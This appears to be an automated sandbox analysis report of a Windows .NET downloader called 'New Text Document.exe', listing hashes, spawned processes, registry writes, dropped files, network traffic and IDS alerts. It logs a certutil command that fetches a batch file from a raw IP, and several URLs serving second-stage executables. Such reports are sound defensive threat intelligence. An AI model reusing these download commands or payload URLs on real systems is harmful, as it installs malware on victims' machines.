File name: | New Text Document.exe |
Full analysis: | https://app.any.run/tasks/0539bb1a-e25e-439c-a057-467e12adccba |
Verdict: | Malicious activity |
Threats: | Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. |
Analysis date: | May 24, 2024, 02:39:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | A239A27C2169AF388D4F5BE6B52F272C |
SHA1: | 0FEB9A0CD8C25F01D071E9B2CFC2AE7BD430318C |
SHA256: | 98E895F711226A32BFAB152E224279D859799243845C46E550C2D32153C619FC |
SSDEEP: | 48:YqYHO2f7Frk70zDJZZJOfTHH/rPmckulbfSqXSfbNtm:27Jlm/6ypf6zNt |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (7.4) |
.exe | | | Win32 Executable (generic) (5.1) |
.exe | | | Generic Win/DOS Executable (2.2) |
.exe | | | DOS Executable Generic (2.2) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2023:09:30 16:32:57+00:00 |
ImageFileCharacteristics: | Executable, 32-bit |
PEType: | PE32 |
LinkerVersion: | 11 |
CodeSize: | 2048 |
InitializedDataSize: | 2048 |
UninitializedDataSize: | - |
EntryPoint: | 0x268e |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows command line |
FileVersionNumber: | 0.0.0.0 |
ProductVersionNumber: | 0.0.0.0 |
FileFlagsMask: | 0x003f |
FileFlags: | (none) |
FileOS: | Win32 |
ObjectFileType: | Executable application |
FileSubtype: | - |
LanguageCode: | Neutral |
CharacterSet: | Unicode |
FileDescription: | |
FileVersion: | 0.0.0.0 |
InternalName: | New Text Document.exe |
LegalCopyright: | |
OriginalFileName: | New Text Document.exe |
ProductVersion: | 0.0.0.0 |
AssemblyVersion: | 0.0.0.0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
336 | "C:\Windows\System32\netbtugc.exe" | C:\Windows\System32\netbtugc.exe | New Text Document.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NetBT Unattend Generic Command Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
524 | "C:\Users\admin\AppData\Local\Temp\a\%ProgramFiles(x86)%\GameSyncLink\GameService.exe" remove GameSyncLinks confirm | C:\Users\admin\AppData\Local\Temp\a\%ProgramFiles(x86)%\GameSyncLink\GameService.exe | GameService.exe | ||||||||||||
User: admin Integrity Level: HIGH Description: The non-sucking service manager Exit code: 3 Version: 2.24 Modules
| |||||||||||||||
524 | certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat | C:\Windows\System32\certutil.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: CertUtil.exe Exit code: 2147942403 Version: 6.1.7601.18151 (win7sp1_gdr.130512-1533) Modules
| |||||||||||||||
524 | "C:\Windows\System32\taskkill.exe" /F /IM Record.exe /T | C:\Windows\System32\taskkill.exe | — | aioc_5.0.0.63_it.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
552 | "C:\Users\admin\AppData\Local\Temp\a\sharonzx.exe" | C:\Users\admin\AppData\Local\Temp\a\sharonzx.exe | sharonzx.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: extrac32 Version: 4.2.2.6 Modules
| |||||||||||||||
676 | "C:\Users\admin\AppData\Local\Temp\is-BP90C.tmp\SrbijaSetupHokej.tmp" /SL5="$101BE,3939740,937984,C:\Users\admin\AppData\Local\Temp\a\SrbijaSetupHokej.exe" /SPAWNWND=$101B8 /NOTIFYWND=$201A8 | C:\Users\admin\AppData\Local\Temp\is-BP90C.tmp\SrbijaSetupHokej.tmp | — | SrbijaSetupHokej.exe | |||||||||||
User: admin Company: GeorGe Integrity Level: HIGH Description: Setup/Uninstall Version: 51.1052.0.0 Modules
| |||||||||||||||
728 | "C:\Users\admin\AppData\Local\Temp\a\crt.exe" /SPAWNWND=$102F2 /NOTIFYWND=$60224 | C:\Users\admin\AppData\Local\Temp\a\crt.exe | crt.tmp | ||||||||||||
User: admin Company: Integrity Level: HIGH Description: CyberSound AudioDirector Setup Version: Modules
| |||||||||||||||
856 | "C:\Users\admin\AppData\Local\Temp\a\Setup.exe" | C:\Users\admin\AppData\Local\Temp\a\Setup.exe | — | New Text Document.exe | |||||||||||
User: admin Company: Video Combiner Integrity Level: MEDIUM Description: Exit code: 3221226540 Version: 1.4 Modules
| |||||||||||||||
904 | "C:\Program Files\Google\Update\GoogleUpdate.exe" /regsvc | C:\Program Files\Google\Update\GoogleUpdate.exe | — | GoogleUpdate.exe | |||||||||||
User: admin Company: Google Inc. Integrity Level: HIGH Description: Google Installer Exit code: 0 Version: 1.3.33.23 Modules
| |||||||||||||||
936 | "C:\Program Files\AIOC5\aioc_5.0.0.63_it.exe" "/StartPath:C:\Users\admin\AppData\Local\Temp\a\aioc_5.0.0.63_it.exe" | C:\Program Files\AIOC5\aioc_5.0.0.63_it.exe | aioc_5.0.0.63_it.exe | ||||||||||||
User: admin Company: 上海优望通科技集团有限公司 Integrity Level: HIGH Description: AIOC5_IT Exit code: 0 Version: 5.0.0.63 Modules
|
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (3968) New Text Document.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\New Text Document_RASMANCS |
Operation: | write | Name: | ConsoleTracingMask |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
3968 | New Text Document.exe | C:\Users\admin\AppData\Local\Temp\a\svc.exe | executable | |
MD5:92C57DD80B764A028749520017D44E76 | SHA256:DBD741A45D840D06D708339F9E9824F2A0D745EA6537CA44BFF233BA7441BFDA | |||
3968 | New Text Document.exe | C:\Users\admin\AppData\Local\Temp\a\sharonzx.exe | executable | |
MD5:0B67ADEB422396C047E87FA78A9E8E80 | SHA256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F | |||
3968 | New Text Document.exe | C:\Users\admin\AppData\Local\Temp\a\server.exe | executable | |
MD5:92C57DD80B764A028749520017D44E76 | SHA256:DBD741A45D840D06D708339F9E9824F2A0D745EA6537CA44BFF233BA7441BFDA | |||
4076 | sharonzx.exe | C:\Users\admin\AppData\Roaming\XxENUzWteJXT.exe | executable | |
MD5:0B67ADEB422396C047E87FA78A9E8E80 | SHA256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F | |||
552 | sharonzx.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
552 | sharonzx.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdb | text | |
MD5:A8B1CC99472D963E363C160997C7F55D | SHA256:924B9DE4D2A615AF21692E3F6A69B01B7CD0FF48CD5F40079D5D8C8F87038434 | |||
552 | sharonzx.exe | C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe | executable | |
MD5:0B67ADEB422396C047E87FA78A9E8E80 | SHA256:66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F | |||
4076 | sharonzx.exe | C:\Users\admin\AppData\Local\Temp\tmp6E3C.tmp | xml | |
MD5:83EC17C4C88E95CDFEA6B4EC5CBA419E | SHA256:76082D1FDA37E982A93E0A4C21D574BAAE592B372F4A2ED2E4B3E8BAC52345AB | |||
552 | sharonzx.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:D898504A722BFF1524134C6AB6A5EAA5 | SHA256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9 | |||
336 | netbtugc.exe | C:\Users\admin\AppData\Local\Temp\sqlite3.dll | executable | |
MD5:9C73B282279E74E40435132E61FDA001 | SHA256:6710D91D77E1937DD5B46D96C0852042985DC78C4C51CE12D3E07A4CDB12C202 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3968 | New Text Document.exe | GET | 200 | 94.232.249.161:80 | http://94.232.249.161/download/svc.exe | unknown | — | — | — |
3968 | New Text Document.exe | GET | 200 | 20.86.128.223:80 | http://20.86.128.223/room/rooma.exe | unknown | — | — | — |
3968 | New Text Document.exe | GET | 200 | 45.84.0.173:80 | http://45.84.0.173/download_22/server.exe | unknown | — | — | — |
3968 | New Text Document.exe | GET | 200 | 85.203.4.146:80 | http://85.203.4.146/Bypass3_Pure_Mode.exe | unknown | — | — | — |
3968 | New Text Document.exe | GET | 404 | 154.215.72.110:80 | http://www.3xfootball.com/fo8o/?M0ZXK=IhZyPQIGe6uK3zPwwQZGg5dCOySeX1ZlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c4YmObsn4mjYdquJ8kgqnO6tqcklFnnhTh4q3IG9YdfoaX8&V2wPV=rl14BFhhp48p | unknown | — | — | — |
552 | sharonzx.exe | POST | 404 | 188.114.97.3:80 | http://rocheholding.top/evie3/five/fre.php | unknown | — | — | — |
552 | sharonzx.exe | POST | 404 | 188.114.97.3:80 | http://rocheholding.top/evie3/five/fre.php | unknown | — | — | — |
336 | netbtugc.exe | GET | 200 | 45.33.6.223:80 | http://www.sqlite.org/2018/sqlite-dll-win32-x86-3250000.zip | unknown | — | — | — |
552 | sharonzx.exe | POST | 404 | 188.114.97.3:80 | http://rocheholding.top/evie3/five/fre.php | unknown | — | — | — |
3968 | New Text Document.exe | GET | 200 | 85.203.4.146:80 | http://85.203.4.146/csrss.exe | unknown | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3968 | New Text Document.exe | 151.101.130.49:443 | urlhaus.abuse.ch | FASTLY | US | unknown |
3968 | New Text Document.exe | 94.232.249.161:80 | — | Syrian Telecom | SY | unknown |
3968 | New Text Document.exe | 20.86.128.223:80 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
3968 | New Text Document.exe | 172.67.162.95:443 | universalmovies.top | CLOUDFLARENET | US | unknown |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3968 | New Text Document.exe | 45.84.0.173:80 | — | Stark Industries Solutions Ltd | MD | unknown |
3968 | New Text Document.exe | 85.203.4.146:80 | — | Datacamp Limited | JP | malicious |
Domain | IP | Reputation |
---|---|---|
urlhaus.abuse.ch |
| unknown |
universalmovies.top |
| unknown |
rocheholding.top |
| unknown |
www.3xfootball.com |
| unknown |
www.sqlite.org |
| unknown |
www.kasegitai.tokyo |
| unknown |
ip-api.com |
| unknown |
7-zip.org |
| unknown |
update.googleapis.com |
| unknown |
leetboy.dynuddns.net |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | Misc activity | ET INFO Packed Executable Download |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
— | — | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
— | — | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
— | — | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
— | — | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |